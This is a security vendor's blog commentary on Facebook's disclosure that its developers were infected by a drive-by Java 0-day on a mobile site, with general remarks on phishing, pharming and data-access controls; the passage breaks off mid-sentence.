Over the weekend, Facebook disclosed that several of its developers got hacked. The infection vector, as stated, was a drive-by malware exploit that was hidden on a mobile site the developers were using. The attack used a 0-day Java vulnerability to infect their computers. Below is analysis of the attack as well as the lessons to be learnt from such an incident by Mr Shteiman, Senior Security Strategist at Imperva.
Phishing and Pharming “Like” Facebook
In a Blog we posted a few months ago, we observed how hackers use social networking sites to develop target lists for phishing scams. We even had an unfortunate example of how such a scam targeted the White House.
Recently, in October 2012, Research by Deloitte identified that 82% of CISOs see phishing & pharming as their greatest cyber security threat.
Modern Phishing
It is important to note that modern phishing and pharming techniques and scary malware infection vectors are just as effective as more traditional threats, such as SQL injection.
Pharming attacks can hit an organization by impersonating or imposing on a software vendor, an open source organization or a user forum, where malicious code is hidden or redirected to from the offending Web site.
For example, a pharming infection might:
Either hack an existing site (a common practice) or build a site offering an open-source “plugin-for-something-great” and make sure that the link redirects to malicious software
Users that need this piece of software will download the payload, or hacker will use a 0-day to infect them directly from the browser.
Infect.
The Facebook Incident and what we can learn from it
In Facebook’s case they claim no data loss, which is difficult to guarantee, unless data access is regulated with proper controls. Controlling data access in your organization ensures that incidents such as this do not result in data loss, even when malware 0-days cannot be prevented –you can prevent data loss and business deep hit.
Facebook is considered a young company employing brilliant minds that are very good at what they do, and as a technology driven company most of its employees would be considered technology aware. And yet, a malware drive-by has caused a breach